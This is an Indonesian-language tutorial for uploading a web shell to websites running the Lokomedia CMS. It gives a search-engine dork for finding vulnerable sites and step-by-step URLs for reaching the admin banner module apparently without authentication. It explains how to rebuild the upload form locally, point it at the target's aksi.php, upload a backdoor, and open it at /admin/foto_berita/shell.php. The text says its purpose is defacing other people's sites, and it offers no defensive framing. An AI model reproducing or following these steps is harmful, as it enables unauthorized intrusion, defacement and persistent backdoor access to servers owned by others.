Tutorial Shell Uploader web Lokomedia

0
[-] SHELL UPLOADER web Lokomedia [+]

Dork : allinurl:media.php?module=berita


Pilih suatu web yang menurut anda bisa di deface dengan lokomedia
 - http://www.target.com/admin/content.php?module=banner
Langsung ganti url web target nya menjadi seperti berikut :

http://www.target.com/admin/modul/mod_banner.php


Kemudian klik icon Tambah Banner dan akan muncul Halaman Upload banner, jangan diapakan dahulu, sekarang kita copy semua html tersebut dengan cara CTRL + U dan simpan di Notepad. Didalam Source tersebut ada :

./aksi.php?module=banner&act=inpu
Kemudian ganti dengan

http://www.target.com/admin/aksi.php?module=banner&act=inpu
Simpan dengan Nama apa saja terserah anda kehendaki dengan format .html, kemudian buka file tersebut dan isilah dengan backdoor yang anda miliki. Selanjutnya tinggal lihat hasil nya di :

http://www.target.com/admin/foto_berita/shell.php